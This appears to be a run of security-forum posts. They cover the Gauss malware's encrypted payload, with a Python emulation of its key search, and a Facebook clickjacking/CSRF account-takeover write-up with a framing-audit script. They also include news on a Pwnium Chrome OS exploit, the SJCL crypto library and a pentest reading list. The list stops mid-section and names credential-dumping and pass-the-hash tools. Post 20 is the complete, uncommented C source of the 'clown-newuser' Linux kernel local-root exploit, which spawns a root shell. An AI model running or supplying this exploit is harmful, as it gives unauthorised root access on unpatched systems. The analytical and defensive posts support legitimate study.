Gauss is by no means the first malware with a payload that was programmed to remain dormant unless it was installed on computers meeting a narrow set of criteria. Stuxnet also contained code instructing it to destroy uranium-enrichment centrifuges only when they were physically located at Natanz. Researchers have theorized that the trigger was implemented to reduce the chances of collateral damage that might result if Stuxnet took hold in other facilities. (The precaution proved wise, since Stuxnet infected more than 100,000 computers scattered all over the globe.)

But as cryptographer Nate Lawson observed more than two years ago, the mechanism Stuxnet used to protect unintended targets from destruction was surprisingly crude for an otherwise advanced cyberweapon developed by countries with almost unlimited budgets. The coding techniques were largely limited to conditional "if/then" range checks that identified computers running German conglomerate Siemens's Simatic Step7 software inside Natanz. If an infected computer met the criteria, the sabotage payload was activated. If not, the exploit sat dormant.

Noticeably absent from Stuxnet was any kind of mechanism preventing researchers, enemies, or potential copycat programmers from peering inside the malware to see what the highly selective payload did. That's precisely what security experts such as Ralph Langner did following the Stuxnet discovery. Within a few weeks, the world had its answer: Stuxnet was a powerful cyberweapon unleashed by a well-resourced government bent on sabotaging Iran's nuclear program. While the developers may have taken care to prevent the worm from attacking other countries, they did little to conceal the true aim and methods of their malware, which attacked programmable logic controllers at the heart of the enrichment process.

"Encrypting your payload so that only the intended target can decrypt it hides both the identity of the victim and the worm's purpose," Lawson recently told Ars. "If Gauss came after Stuxnet, it's clear the authors disliked the publicity its PLC [programmable logic controller] payload received and made an effort to hide it properly the second time."

The notion of software containing a "secure trigger" isn't new either. Scientists such as Fritz Hohl theorized about it as early as 1998 in a paper titled "Time Limited Blackbox Security: Protecting Mobile Agents From Malicious Hosts." Researchers from security firm Core Security expanded on the idea eight years later in a paper titled "Foundations and applications for secure triggers." The idea was to use strong cryptography to ensure a piece of code or content remained secret until a particular event occurred. Once the preselected condition was met—and only if it was met—the concealed payload was automatically disclosed or executed. Otherwise it remained locked inside an impenetrable vault.

Gauss developers implemented this advanced concept using a surprisingly unsophisticated set of tools. That set includes the relatively archaic RC4 cipher to encrypt three sections of the Gödel module and the cryptographically weak MD5 algorithm to generate the key. Gauss developers likely chose the outdated design because it worked reliably across a broad range of Windows computers thanks to the Microsoft CryptoAPI.

Keys unlocking the Gödel payload are generated dynamically based on the settings of one or more computers that were specifically targeted by the attackers. Only the machine or machines containing a specific set of programs and directories will generate the key. To confound people trying to crack the code—and to considerably slow the speed at which they work—Gauss MD5 hashes the configuration data 10,000 times and uses the final output as the key that unlocks the encrypted code.
[Figure: Gödel's mysterious encrypted data is stored in three sections. Kaspersky Lab]

Specifically, Gauss enumerates the first entry of an infected computer's path environment, which specifies the Windows directories where executable files can be called without specifying their precise location. Gauss then combines that PATH location with the name of the first directory found in the infected computer's Windows Program Files folder. It takes this string and appends a 16-byte hard-coded cryptographic salt value to it and then hashes the new string 10,000 times. It compares the final hash against a hard-coded verification block. If the hash doesn't pass the verification check, Gauss starts the process all over again, this time appending the second entry of the path to the first Program Files folder. The process is repeated until each entry in the path has been appended to each entry in the Program Files.

If a hash value passes the verification check, Gauss has located the mysterious PATH and program file that the Gödel module was programmed to find. It then takes that string, appends a new salt value to it, and hashes it 10,000 times. The resulting hash is the RC4 key used to decrypt one of the three encrypted Gödel sections. If the decrypted block passes an additional verification check, Gauss takes the same path and program files string, then appends a different hard-coded salt to decrypt sections two and three.

[Figure: A simplified flow-chart showing Gödel's decryption routine. Eric Bangeman]

[Figure: Example of the string pair, second string starting from “~dir”, and first salt. Kaspersky Lab]

Researchers believe the routine was put in place to attack a computer or computers with a specific program installed. One of the checks Gauss performs ensures that the first letter or symbol of the targeted Program Files directory is a special character such as a tilde (~), bracket ({), or comes from Arabic, Hebrew, or another language with an extended character set.
Given the detailed logic built into Gödel, it's fair to assume the attackers had cased their intended target for months or years, using another module in Gauss or other espionage trojans altogether.

Literally take forever

The use of real Windows configuration variables poses some unusual challenges for cryptographers trying to crack the payload. While the number of possible inputs, for instance, could theoretically be 2^1000 or higher, the actual number is almost certainly far lower since real-world path strings are almost always in human-readable form. (While a password may randomly be generated, path strings typically follow conventions such as "C:\Program Files\Common Files\Microsoft Shared\Windows Live.") Then again, the strings still have the ability to incorporate unique names or even randomly generated values few eyes have ever seen before.

The likelihood that the sought-after Program Files folder contains characters from a different language could pose its own obstacles and benefits. While it narrows the possible choices, it may also require crackers to incorporate alphabets bigger than those that include standard English characters.

"Password cracking becomes more difficult as the input space grows," Karsten Nohl, a cryptographer with Security Research Labs, told Ars. "The input space for the Gauss unlock password is all names of Windows programs in certain languages, which should be a relatively small space compared to the billions of combinations a password cracker typically tries. However, nobody has a complete list of Windows programs."

He continued: "To find the Gauss unlock password, good heuristics are needed that guess Windows program names. Simply brute-forcing the space from '???...' to '???...' is not an option as it would literally take forever."

So far, Kaspersky researchers have tried millions of combinations to no avail. In December, they redoubled their efforts by recruiting the creator of the Hashcat password recovery program.
That resulted in ocl-GaussCrack, an open-source application that streamlines the cracking of the Gödel module and harnesses the speed of graphics cards to accelerate the process. Typically, GPU crackers can try billions of guesses per second against MD5-derived hashes, but thanks to the design of the encryption routine, GaussCrack can achieve just 489,000 candidate passcodes each second. Posing yet another burden on crackers, the Gauss architects were able to hinder crackers by iterating the hash 10,000 times, a technique often referred to as key stretching.

Just as the amassing of hundreds of millions of real-world passwords has fueled recent advances in password cracking, a comprehensive corpus of likely Windows configurations targeted by Gauss is the most likely way to solve the Gödel mystery. Jens Steube, the Hashcat and GaussCrack developer better known as Atom, said he still hasn't settled on the best method for compiling the data. One possibility is to tap into databases already assembled by antivirus companies or other vendors of software that collect the names of programs installed on hundreds of millions of computers. Another possibility, Kaspersky's Raiu said, is to seek help from the National Institute of Standards and Technology or a similar organization.

The encrypted payload in the Gödel module is by no means the only mystery surrounding Gauss. Researchers still don't know how the malware takes hold of target computers in the first place or how it spreads from one machine to another. They're also at a loss to explain why Gauss installs a custom font known as "Palida Narrow" and corresponding registry values on infected machines. Analysts have speculated that the font may be used to steganographically fingerprint the author of certain printed materials.
Under alternate theories, Palida Narrow, which appears to contain valid Western, Baltic, and Turkish symbols, may provide a simple means for websites to identify infected machines, or even open a font-based vulnerability to exploit.

Also unexplained is the Round Robin DNS load balancing technique deployed by control servers used to ferry traffic to and from Gauss-infected machines. The setup suggests that the command servers handled massive amounts of traffic, and yet so far, Kaspersky researchers have been able to find just 2,500 computers infected by the malware. The effort Gauss architects expended setting up the load-balancing system indicates that the true number of affected machines could be in the tens of thousands.

Still, the biggest mystery connected to Gauss undoubtedly remains the encrypted payload tucked inside its Gödel module. Given the destruction malware creators brought about with Stuxnet, it wouldn't be a stretch if Gauss targeted additional enemy-operated PLCs or an entirely unseen class of equipment in the fledgling annals of computer warfare. The choice that Gödel be transmitted using USB drives suggests it was targeting "air-gapped" systems so sensitive they weren't connected to the Internet.

"It's one of the biggest mysteries of our times and this is a very cool challenge for any security researcher out there who cares about security," Raiu told Ars. "What could we find inside the Gauss payload? PLC code? Zero-days? Code to target unknown systems? Nobody knows for sure and it is probably the incertitude which makes it the most captivating mystery."

Thanks to Jeremy Gosney of Stricture Consulting Group, Hashcat developer Jens Steube, and Johns Hopkins University professor Matt Green for their assistance in reporting this story.

Story updated to add "reportedly" in first paragraph.

Source: Puzzle box: The quest to crack the world’s most mysterious malware warhead | Ars Technica
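The candidate search and key stretching the article describes, as an added example (this is not Kaspersky's, GaussCrack's or the malware's code). The hash chaining across the 10,000 rounds, the way a PATH entry is joined to a directory name, both salts and the sample file-system layout are constructed assumptions; the point is to show why each guess is expensive and why the search space is a list of real directory names rather than random passwords.

```python
"""Simplified Gödel-style "secure trigger": search, verify, derive key, decrypt."""
import hashlib
import time

ROUNDS = 10_000                   # key-stretching factor named in the article
SALT_VERIFY = bytes(range(16))    # constructed 16-byte salt, not the real one
SALT_KEY = bytes(range(16, 32))   # constructed second salt for the RC4 key


def stretch(data: bytes, salt: bytes, rounds: int = ROUNDS) -> bytes:
    """MD5(candidate || salt), then re-hash digest || salt until 'rounds' hashes
    have been computed. The chaining is an assumption; only the round count
    comes from the article."""
    digest = hashlib.md5(data + salt).digest()
    for _ in range(rounds - 1):
        digest = hashlib.md5(digest + salt).digest()
    return digest


def candidate(path_entry: str, program_dir: str) -> bytes:
    """The string hashed per guess: one %PATH% entry plus one Program Files
    directory name. The '|' separator is an assumption."""
    return (path_entry + "|" + program_dir).encode("utf-8")


def find_trigger(path_entries, program_dirs, verification_block: bytes):
    """Emulate Gödel's loop: for each Program Files directory, try every PATH
    entry until the stretched hash equals the hard-coded verification block.
    Returns (path_entry, program_dir, attempts), or (None, None, attempts)."""
    attempts = 0
    for program_dir in program_dirs:
        for path_entry in path_entries:
            attempts += 1
            if stretch(candidate(path_entry, program_dir), SALT_VERIFY) == verification_block:
                return path_entry, program_dir, attempts
    return None, None, attempts


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def unlock_section(path_entry: str, program_dir: str, ciphertext: bytes) -> bytes:
    """Second stretching with the other salt yields the RC4 key for a section."""
    key = stretch(candidate(path_entry, program_dir), SALT_KEY)
    return rc4(key, ciphertext)


# Constructed target machine: the directory name starts with '~', as the
# article says the real target's does. The "encrypted section" is built here
# from a placeholder; in Gauss the plaintext is the unknown payload.
TARGET_PATH = r"C:\Windows\system32"
TARGET_DIR = "~Dir1"
VERIFICATION_BLOCK = stretch(candidate(TARGET_PATH, TARGET_DIR), SALT_VERIFY)
SECTION_1 = rc4(stretch(candidate(TARGET_PATH, TARGET_DIR), SALT_KEY), b"payload placeholder")


def rate_per_second(samples: int = 20) -> float:
    """How many stretched candidates one CPU core checks per second here; the
    10,000 rounds are what keeps this far below plain MD5 speed."""
    t0 = time.perf_counter()
    for n in range(samples):
        stretch(candidate(TARGET_PATH, f"dir{n}"), SALT_VERIFY)
    return samples / (time.perf_counter() - t0)


if __name__ == "__main__":
    paths = [r"C:\Windows", r"C:\Windows\system32", r"C:\Python27"]
    dirs = ["Common Files", "Internet Explorer", "~Dir1"]
    p, d, n = find_trigger(paths, dirs, VERIFICATION_BLOCK)
    print(f"match after {n} guesses: {p!r} + {d!r}")
    print("section 1 ->", unlock_section(p, d, SECTION_1))
    print(f"{rate_per_second():.0f} stretched guesses/s on this CPU")
```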
  19. UI Redressing against Facebook

In this post, I'm going to discuss a possible attack scenario, targeting the Facebook web application, that could lead to the reset of account passwords in an automated fashion exploiting a UI Redressing issue with the use of a cross-domain extraction technique.

UI Redressing bug, again

During my research, I discovered a Facebook web resource that is not protected by X-Frame-Options and that includes the fb_dtsg token, which is adopted as an anti-CSRF token (Figure 1). The following is the affected URL: Selectează limba | Facebook

Figure 1 - Facebook's web resource vulnerable to UI Redressing attacks.

The iframe-to-iframe extraction method can be applied here to extract fb_dtsg's value and, consequently, perform a series of Cross-Site Request Forgery attacks against the integrity of the victim's profile data.

The theory behind the Facebook profiles takeover

Facebook allows users to add a mobile number that, once certified, can be adopted as username in order to login or reset the account's password. Users can insert their mobile numbers via the Account Settings → Mobile → Add a phone → add your phone number options (Figure 2 and Figure 3): a confirmation code is therefore sent by Facebook's system to the user's mobile phone and it must be inserted (Figure 4) to complete the activation process.
Figure 2 - Users can add their mobile number via the "add your phone number here" link.

Figure 3 - Facebook's form used to add a mobile number.

Figure 4 - A confirmation code is sent to the user's mobile and must be entered to complete the process.

The main issue here is that no password is required to associate the mobile number to the user's profile. Because of this, an attacker may abuse the described UI Redressing vulnerability to steal the fb_dtsg token and register an arbitrary phone number. Despite this, the attacker still needs to insert the confirmation code in order to associate his mobile number. A bit of black magic helps here: the attacker can abuse an SMS to mail mobile application to automatically forward the Facebook text message (SMS) to an attacker-controlled mail box, thus allowing a hypothetical exploit to fetch the code and complete the insertion process.

The exploit

A working Proof of Concept exploit has been developed in order to demonstrate the described attack. We have also shared the code with the Facebook security team. During my experiments, the Android application SMS2Mail has been adopted to forward the Facebook SMS (Figure 5) to the mail box (Figure 6).
Figure 5 - SMS with the Facebook's confirmation code that has been forwarded to the attacker's mail box.

Figure 6 - Facebook confirmation code forwarded to the attacker's mailbox.

The following steps summarize the exploitation phases:

1. The exploit frames the vulnerable resource and allows the victim to play a fake game while performing the cross-domain content extraction;
2. The fb_dtsg anti-CSRF token and the victim's user id are extracted. An HTTP request is forwarded to the Facebook application in order to emulate the attacker-controlled mobile number registration;
3. A text message (SMS), containing the confirmation code, is sent to the attacker's mobile device. An SMS2Mail mobile application is installed on the attacker's device and automatically forwards the SMS to an attacker-controlled mail box;
4. The exploit waits for the SMS to be forwarded to the mail box, then extracts the confirmation code and performs a second CSRF attack in order to submit the code itself and complete the mobile number registration.

The attacker's mobile number is now associated with the victim's profile and can be used to reset the account's password. As a matter of fact, Facebook allows users to enter a previously associated mobile number (Figure 7) which is then used to send a reset code (Figure 8).
Figure 7 - Reset password mechanism involving the user's mobile number.

Figure 8 - Facebook's form used to insert the resetting code.

A fully automated Proof of Concept exploit can be downloaded here, while the following video illustrates the described attack:

Posted by Luca De Fulgentis, Tuesday, March 19, 2013

Source: Nibble Security: UI Redressing against Facebook
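The precondition of the attack above is a page that carries the anti-CSRF token but can be framed from an arbitrary origin. The check below is an added example, not code from the original post or from Facebook: it evaluates X-Frame-Options and CSP frame-ancestors the way a browser would and flags responses that both contain the fb_dtsg token and are frameable by an attacker's origin. The sample responses, origins and hostnames are constructed, not real captures.

```python
"""Framing-protection audit for pages that embed an anti-CSRF token."""
from urllib.parse import urlsplit

TOKEN_NAME = "fb_dtsg"                     # token name from the post
DEFAULT_PORTS = {"http": 80, "https": 443}


def _origin_tuple(origin: str):
    p = urlsplit(origin)
    return (p.scheme.lower(), p.hostname, p.port or DEFAULT_PORTS.get(p.scheme.lower()))


def _same_origin(a: str, b: str) -> bool:
    """Scheme, host and port must all match."""
    return _origin_tuple(a) == _origin_tuple(b)


def _frame_ancestors(csp: str):
    """Source list of the frame-ancestors directive, or None if the policy has none."""
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            return parts[1:]
    return None


def _origin_allowed(sources, origin: str) -> bool:
    """Match an embedding origin against CSP source expressions:
    '*', 'none', a scheme ('https:'), a host, or a wildcard host ('*.x.y').
    Port matching on host sources is intentionally left out of this demo."""
    parsed = urlsplit(origin)
    host = parsed.hostname or ""
    scheme = parsed.scheme.lower()
    for src in sources:
        s = src.lower()
        if s == "*":
            return True
        if s == "'none'":
            continue
        if s in (scheme + ":", scheme):
            return True
        src_host = urlsplit(s if "://" in s else "//" + s).hostname or ""
        if src_host.startswith("*.") and host.endswith(src_host[1:]):
            return True
        if src_host == host:
            return True
    return False


def framing_allowed(headers: dict, page_origin: str, embedder_origin: str) -> bool:
    """True if a browser would render this response inside a frame served from
    embedder_origin. A frame-ancestors directive, when present, takes precedence
    over X-Frame-Options (CSP Level 2 behaviour)."""
    lower = {k.lower(): v for k, v in headers.items()}
    csp = lower.get("content-security-policy", "")
    sources = _frame_ancestors(csp) if csp else None
    if sources is not None:
        expanded = [page_origin if s.lower() == "'self'" else s for s in sources]
        return _origin_allowed(expanded, embedder_origin)
    xfo = lower.get("x-frame-options", "").strip().upper()
    if not xfo:
        return True                         # no restriction at all: the vulnerable case
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return _same_origin(page_origin, embedder_origin)
    if xfo.startswith("ALLOW-FROM"):
        parts = xfo.split(None, 1)
        return len(parts) == 2 and _same_origin(parts[1].lower(), embedder_origin)
    return True                             # unrecognised value: browsers ignore it


def audit_token_pages(responses, embedder_origin: str, token: str = TOKEN_NAME):
    """Return the URLs that both carry the token and can be framed from embedder_origin."""
    flagged = []
    for r in responses:
        origin = "{0.scheme}://{0.netloc}".format(urlsplit(r["url"]))
        if token in r["body"] and framing_allowed(r["headers"], origin, embedder_origin):
            flagged.append(r["url"])
    return flagged


# Constructed responses (hostnames, headers and bodies are made up for the demo).
SAMPLE_RESPONSES = [
    {"url": "https://site.example/settings/language",
     "headers": {"Content-Type": "text/html"},
     "body": '<input type="hidden" name="fb_dtsg" value="CONSTRUCTED-TOKEN">'},
    {"url": "https://site.example/home",
     "headers": {"Content-Type": "text/html", "X-Frame-Options": "DENY"},
     "body": '<input type="hidden" name="fb_dtsg" value="CONSTRUCTED-TOKEN">'},
    {"url": "https://site.example/static/logo.png",
     "headers": {"Content-Type": "image/png"},
     "body": "(image bytes, no token)"},
]

if __name__ == "__main__":
    print("frameable token pages:", audit_token_pages(SAMPLE_RESPONSES, "https://attacker.example"))
```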
  20. GNU/Linux kernel(3.8+)Privilege Escalation Vulnerability

#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <errno.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>

int go[2];
char child_stack[1<<20];
extern char **environ;

void die(const char *msg)
{
	perror(msg);
	exit(errno);
}

int child(void *arg)
{
	char c;

	close(go[1]);
	read(go[0], &c, 1);
	setuid(0);
	if (chdir("chroot") < 0)
		die("[-] chdir");
	if (chroot(".") < 0)
		die("[-] chroot");
	return 0;
}

int setup_chroot(const char *me)
{
	mkdir("chroot", 0755);
	mkdir("chroot/lib64", 0755);
	mkdir("chroot/bin", 0755);
	if (link(me, "chroot/lib64/ld-linux-x86-64.so.2") < 0)
		die("[-] link");
	if (link("/bin/su", "chroot/bin/su") < 0)
		die("[-] link");
	return 0;
}

int main(int argc, char *argv[])
{
	char *su[] = {"/bin/su", NULL};
	char *sh[] = {"/bin/bash", NULL};
	char me[256], *mee[] = {me, "1", NULL};
	char uidmap[128], map_file[128];
	pid_t pid;
	struct stat st;
	int fd;

	if (geteuid() == 0 && argc == 1) {
		printf("[+] Yay! euid=%d uid=%d\n", geteuid(), getuid());
		chown("lib64/ld-linux-x86-64.so.2", 0, 0);
		chmod("lib64/ld-linux-x86-64.so.2", 04755);
		exit(0);
	} else if (geteuid() == 0) {
		/* this will run outside */
		setuid(0);
		execve(*sh, sh, environ);
		die("[-] execve");
	}

	printf("[**] clown-newuser -- CLONE_NEWUSER local root (C) 2013 Sebastian Krahmer\n\n");
	memset(me, 0, sizeof(me));
	readlink("/proc/self/exe", me, sizeof(me) - 1);
	printf("[+] Found myself: '%s'\n", me);

	if (fork() > 0) {
		printf("    [*] Parent waiting for boomsh to appear ...\n");
		for (;;) {
			stat(me, &st);
			if (st.st_uid == 0)
				break;
			usleep(1000);
		}
		execve(me, mee, environ);
		die("[-] execve");
	}

	printf("    [*] Setting up chroot ...\n");
	setup_chroot(me);
	printf("[+] Done.\n    [*] Cloning evil child ...\n");

	if (pipe(go) < 0)
		die("[-] pipe");
	pid = clone(child, child_stack + sizeof(child_stack), CLONE_NEWUSER|CLONE_FS|SIGCHLD, NULL);
	if (pid == -1)
		die("[-] clone");

	printf("[+] Done.\n    [*] Creating UID mapping ...\n");
	snprintf(map_file, sizeof(map_file), "/proc/%d/uid_map", pid);
	if ((fd = open(map_file, O_RDWR)) < 0)
		die("[-] open");
	snprintf(uidmap, sizeof(uidmap), "0 %d 1\n", getuid());
	if (write(fd, uidmap, strlen(uidmap)) < 0)
		die("[-] write");
	close(fd);
	printf("[+] Done.\n");

	close(go[0]);
	write(go[1], "X", 1);
	waitpid(pid, NULL, 0);
	execve(*su, su, NULL);
	die("[-] execve");
	return -1;
}

Source: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team
  21. I reopened the topic because, even though there is a lot of rambling in it, it is an important subject: how we see hackers, who they are and what they do. Moreover, the main subject, this documentary, sheds some light on certain situations, even if it rambles in places. It's a free country and everyone has the right to express their opinion and to respect, or not, those who give interviews.
  22. Yes, they don't work from nist.gov either, they are the same ones, probably removed by Google. This one is interesting: National Vulnerability Database (NVD) National Vulnerability Database (CVE-2013-0913), kernel 3.8. And the other one, with somewhat more details: http://www.scip.ch/en/?vuldb.8021
  23. Google Chrome OS Linux WAS Exploited at Pwnium 2013 for $40,000

By Sean Michael Kerner | March 18, 2013

From the 'Linux Kernel Exploit' files:

Earlier this month, Google Chrome running Chrome OS (Linux!) was hailed as being a survivor in the Pwnium/Pwn2own event that hacked IE, Firefox and Chrome browsers on Windows. Apple's Safari running on Mac OS X was not hacked and neither (apparently) was Chrome on Chrome OS.

Google disclosed this morning that Chrome on Chrome OS had in fact been exploited - albeit, unreliably. The same researcher that took Google's money last year for exploiting Chrome, known publicly only as 'PinkiePie', was awarded $40,000 for exploiting Chrome/Chrome OS via a Linux kernel bug, config file error and a video parsing flaw.

Google has already fixed the flaws in ChromeOS 25.0.1364.173, BUT seeing as this is a Linux kernel flaw, I'm very curious if this affects any/all other Linux distros. As is typical for Google, they offer very little in the way of full-disclosure or detail on the flaw fixed. All that Google has publicly posted now is:

[181083] High CVE-2013-0915: Overflow in the GPU process. Credit to Pinkie Pie.
[chromium-os:39733] High CVE-2013-0913: Time-of-Check/Time-of-Use and counting overflows in i915 driver. Credit to Pinkie Pie.

Neither of those issues is specifically identified as a 'Linux kernel' issue. Google has also not publicly opened up those CVEs so it's not possible to see the exact bug (which possibly could be with the kernel). As Google is a responsible firm, I'd suspect/hope that the bug has been submitted upstream, though right now it's not super clear to me where that is.

In any event, it's a chained bug and not something that was a reliable exploit, but still...would/will be good to see it eliminated from the mainline Linux kernel sooner rather than later.

Source: Google Chrome OS Linux WAS Exploited at Pwnium 2013 for $40,000 - InternetNews.
  24. Stanford Javascript Crypto Library

The Stanford Javascript Crypto Library (hosted here on GitHub) is a project by the Stanford Computer Security Lab to build a secure, powerful, fast, small, easy-to-use, cross-browser library for cryptography in Javascript.

SJCL is easy to use: simply run sjcl.encrypt("password", "data") to encrypt data, or sjcl.decrypt("password", "encrypted-data") to decrypt it. For users with more complex security requirements, there is a much more powerful API, described in the documentation and illustrated in this demo page.

SJCL is small but powerful. The minified version of the library is under 6.4KB compressed, and yet it posts impressive speed results. (TODO: put up a benchmarks page.)

SJCL is secure. It uses the industry-standard AES algorithm at 128, 192 or 256 bits; the SHA256 hash function; the HMAC authentication code; the PBKDF2 password strengthener; and the CCM and OCB authenticated-encryption modes. Just as importantly, the default parameters are sensible: SJCL strengthens your passwords by a factor of 1000 and salts them to protect against rainbow tables, and it authenticates every message it sends to prevent it from being modified. We believe that SJCL provides the best security which is practically available in Javascript. (Unfortunately, this is not as great as in desktop applications because it is not feasible to completely protect against code injection, malicious servers and side-channel attacks.)

SJCL is cross-browser. We hope. We've tested it on all the installed browsers on the security lab computers (including various versions of Internet Explorer, Chrome, Firefox, Safari and Opera on Mac, Linux and Windows) and on the rhino engine, but still need to do more comprehensive testing. We have a test page up on this site; if it reports any failures, please report an issue.

SJCL is open. You can use, modify and redistribute it under a BSD license or under the GNU GPL, version 2.0 or higher.

SJCL supports primarily symmetric-key cryptography, but there's an experimental branch with elliptic curve support (ECDH public key encryption and ECDSA signatures).

SJCL was written by Emily Stark, Mike Hamburg and Dan Boneh at Stanford University. Special thanks to Aldo Cortesi and Roy Nicholson for reporting bugs in earlier versions of SJCL. A whitepaper on SJCL (also by Emily Stark, Mike Hamburg and Dan Boneh) was published in the 2009 Annual Computer Security Applications Conference.

Sursa: Stanford Javascript Crypto Library
  25. Resources for Aspiring Penetration Testers
Scott Sutherland, March 11, 2013

At some point, all penetration testers get asked, "Where did you learn all this stuff?" In my experience, the question often comes from clients and students interested in pen testing. Usually, they're asking because they aren't sure where to start. There are a number of two- and four-year college programs that can provide a nice structured approach, but generally I think penetration testing is like any other skillset; if you find the right resources, a good direction, and study hard, you'll acquire the skills you're looking for. However, I will say that it does help to already have a strong IT background. Regardless of the path taken, it's nice to have some decent resources along the way. In this blog, I've put together a list of books and online training resources that cover topics and skills that I've found useful as a penetration tester. Hopefully the list is also useful to those of you interested in getting your feet wet. Have fun and Hack Responsibly!

Recommended Books

Read, read, and read some more. Recommending that people "Read the F***ing Manual" (RTFM) is just as important today as it was 20 years ago. The list below is really directed at specific tasks that most penetration testers have to perform. I'm aware that there are some obvious gaps in the list, but I haven't found any books that I really love related to privilege escalation, network attacks, AV evasion, or penetration testing as a profession. Regardless, I hope you enjoy the books as much as I have.

Web Application Hacker's Handbook 2nd Edition
Every penetration tester should have a copy of this book. It has good coverage on a lot of web application attack methods with an emphasis on Burp Suite, which is a very robust local HTTP proxy.

SQL Injection Attack and Defense
This book is very complementary to the Web Application Hacker's Handbook. It provides a pretty straightforward approach for identifying and exploiting SQL injection flaws on common database platforms. As a side note, I also recommend playing with Burp Suite and SQLMap while learning how to perform SQL injection attacks.

Web Application Obfuscation
This book is also complementary to the Web Application Hacker's Handbook and SQL Injection Attack and Defense. It provides a decent overview of techniques that can be used to essentially hide your attacks from web application firewalls, intrusion prevention systems, and web application input filters.

Database Hacker's Handbook
This is an oldie but a goody. It provides some great coverage on how to attack the common database platforms. This can come in handy if you're hoping to escalate your privileges on the database level after finding an SQL injection issue.

Managed Code Rootkits
This book provides manual and automated methods for reverse engineering managed code applications and frameworks. It covers the .NET framework, Java RTE, and Dalvik applications. I thought it was interesting because it has a large focus on actually poisoning the frameworks instead of the application directly. However, it should be noted that this book does not focus on advanced debugging techniques like most reversing books.

A Guide to Kernel Exploitation: Attacking the Core
Not all penetration testers spend their days developing kernel exploits, but it's still good to know the basics. This book has a focus on understanding kernel exploits and how they actually expose operating system vulnerabilities. So far, it's been a good read, but I haven't finished it yet. Someone also recently recommended The Shellcoder's Handbook to me, so consider that as well.

Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software
I liked this one a lot. It provides a good assembly primer which can come in handy in a lot of ways during a penetration test. It also provides decent coverage in areas that you would expect like static and dynamic malware analysis, file structures, test handlers, packers, and debugging. I've also heard that the IDA PRO Book is great if you want to become the reversing master of the universe. However, I don't actually own it at the moment.

Gray Hat Python
I really like this book as well. It's a quick read and it does a good job of describing different debugging, injection, and fuzzing techniques. It also provides a lot of sample code that can be used to perform tasks like hooking and DLL/code injection. I've found both techniques to be quite handy for avoiding anti-virus solutions and stealing data protected with encryption.

Windows Internals, Part 1 / Part 2: Covering Windows Server 2008 R2 and Windows 7
I will most likely never finish either of these books in their entirety. However, they do make great references. If you ever need to know anything about how any part of Windows works, these are the go-to books.

Network exploration and security auditing cookbook
Nmap has become one of the fundamental "tools of the trade" over the past decade or so. In my opinion, it's as valuable to administrators as it is to attackers. I think that every IT professional should know what Nmap is and how to use it. This book is a great start for someone who has not been exposed to it in the past. It covers everything from basic system discovery to writing your own plugins to scan for vulnerabilities.

MetaSploit: A Penetration Tester's Guide
MetaSploit has also become one of the fundamental "tools of the trade" in recent years. There is a lot of community involvement and I think this is a good book for beginners who want to learn more about MetaSploit and some practical use cases.

Free Online Training and Vulnerable VMs

Obviously, there are a ton of great blogs, training sites, and vulnerable VMs/applications out there. I will not be covering all of them. However, I've tried to include online resources that are valuable for beginners and veterans alike.

SecurityTube
SecurityTube is like YouTube, but the videos are dedicated to teaching penetration test skills. Our intern actually recommended this site to me before I knew what it was. Since that time, I've been checking every time I start learning a new topic just to see if they have already covered it. I feel the quality of the tutorials is great and obviously recommend it.

Irongeek
It's not a pretty site, but it provides a lot of good content. It is also known for releasing video presentations from security conferences in record time.

MetaSploit Unleashed
This web site provides a free online course all about MetaSploit. They do ask for donations to fund Hackers for Charity, which raises funds for underprivileged children in East Africa. It's a great site with a great cause; I recommend checking it out.

VulnHub
Reading only gets you so far. Most people in IT are hands-on learners, so in order to get your hands dirty, I recommend checking out VulnHub. This is a relatively new site that supplies virtual machines that are designed to be vulnerable. For those of you looking for a quick way to set up a testing lab at home, this may be the most cost/time effective solution.

Bug bounties
If you feel you have the skills that can now pay the bills, there are lots of companies willing to pay real money if you find a big issue in their product. Below is a site dedicated to consolidating a list of the companies currently paying "bug bounties".

Good Google Searches

As I mentioned earlier, I haven't been able to find books that cover everything I'd like them to. Where books fail, Google usually succeeds. I suggest using it to find good archived presentations from security conferences such as Defcon, Blackhat, Derbycon etc. Below I've also provided some topics that you might find interesting.

Windows Penetration and Escalation
In my experience, 90% of enterprise environments are Windows-based operating systems that centralize access control around Active Directory Services. Therefore, it's good to have an understanding of the tools and techniques used to escalate privileges in those environments. Unfortunately, I have yet to find a single book that covers it well; below are some basic keywords, vulnerability categories, and tools to get you started.
- Default passwords
- Clear text passwords
- Excessive privileges: users, services, GUI, files, registry, memory
- Insecure local and remote services
- Insecure scheduled tasks
- Local and remote exploits
- Password guessing: medusa, hydra, bruter, and MetaSploit
- Password and hash dumping: Cain, LSA secrets, credential manager, fgdump, mimikatz, MetaSploit post modules
- Password hash cracking: john the ripper, hashcat, lophtcrack, masking, Cain
- Impersonating users: incognito, mimikatz, pass the hash, MetaSploit psexec, shared accounts, smbexec

Linux Penetration and Escalation
Even though Linux and UNIX systems aren't in the majority on most networks, they still have a role to play and so, naturally, it's good to understand their soft spots as well. For the most part, Linux has many of the same basic keywords and vulnerability categories as Windows:
- Default passwords
- Clear text passwords
- Excessive privileges: users, services, GUI, files, memory, setuid, orphan files, world writable files, sudoers configurations
- Insecure local and remote services
- Insecure scheduled tasks
- Local and remote exploits
- Password guessing: medusa, hydra, bruter, and MetaSploit
- Password and hash dumping
- Password hash cracking: john the ripper, hashcat, masking

Man in the Middle (MITM) Attacks
